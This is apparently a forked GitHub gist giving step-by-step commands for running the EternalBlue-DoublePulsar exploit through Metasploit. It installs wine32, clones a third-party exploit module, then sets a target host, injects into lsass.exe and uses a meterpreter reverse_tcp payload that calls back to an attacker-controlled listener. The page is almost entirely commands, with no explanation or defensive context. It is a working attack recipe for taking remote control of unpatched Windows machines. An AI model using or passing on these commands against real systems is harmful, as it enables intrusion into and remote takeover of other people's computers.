Skip to content

Instantly share code, notes, and snippets.

@SrikeshMaharaj
Forked from hva314/eb_msf
Created February 27, 2023 09:03
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save SrikeshMaharaj/3ea5c0693b88ea42e46d16b0b9febd71 to your computer and use it in GitHub Desktop.
Save SrikeshMaharaj/3ea5c0693b88ea42e46d16b0b9febd71 to your computer and use it in GitHub Desktop.
EternalBlue-DoublePulsar Metasploit Module
## setting up wine32
dpkg --add-architecture i386
apt-get update
apt-get install wine32
mkdir -p /root/.wine/drive_c/
## get doublepulsar module for metasploit
mkdir -p /root/.msf4/modules/exploits/windows/smb/
git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git /root/.msf4/modules/exploits/windows/smb/
## metaspsloit
msf > use exploit/windows/smb/eternalblue_doublepulsar
> set DOUBLEPULSARPATH /root/.msf4/modules/exploits/windows/smb/deps
> set ETERNALBLUEPATH /root/.msf4/modules/exploits/windows/smb/deps
> set PROCESSINJECT lsass.exe
> set RHOST 192.168.1.7
> set TARGETARCHITECTURE x64
> set payload windows/x64/meterpreter/reverse_tcp
> set LHOST 192.168.1.254
> set LPORT 7554
> exploit -j
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment